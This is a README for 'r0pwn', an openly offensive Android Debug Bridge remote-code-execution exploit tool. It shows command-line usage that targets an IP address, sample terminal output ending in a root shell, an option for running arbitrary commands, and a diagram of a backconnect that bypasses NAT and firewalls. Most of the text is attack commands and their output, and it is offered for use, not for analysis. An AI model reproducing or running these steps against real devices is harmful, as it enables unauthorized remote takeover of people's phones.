hmm... r0pwn means robot pwn?
Android Debug Bridge RCE exploit.
This is a repo of an exploit, but this exploit is a part of the Ghost Framework developed by @entynetproject.
android-platform-tools
python3 exploit.py <target>
NOTE: Target should have wireless debugging turned on
root@kali:~/r0pwn# python3 exploit.py 192.168.1.75
======================
r0pwn by Ivan Nikolsky
======================
Android Debug Bridge RCE exploit.
exploiting 192.168.1.75...
root@nevada:~# whoami
root
root@nevada:~#
root@kali:~/r0pwn# python3 exploit.py <target> -s <code>
NOTE: Angry substitution will not work without SUID/root!
root@kali:~/r0pwn# python3 exploit.py 192.168.1.75 -s whoami
======================
r0pwn by Ivan Nikolsky
======================
Android Debug Bridge RCE exploit.
exploiting 192.168.1.75...
substituting whoami...
executing whoami...
root
backconnect (over ADB)
+------------------------------+
| |
attacker --- r0pwn --- NAT -+- Firewall -+- target
| |
+------------+
bypass
Authors:
- Ivan Nikolsky (@enty8080) -
research
anddevelopment
.
Special Thanks:
- PhoneSploit - thanks for
inspiration
.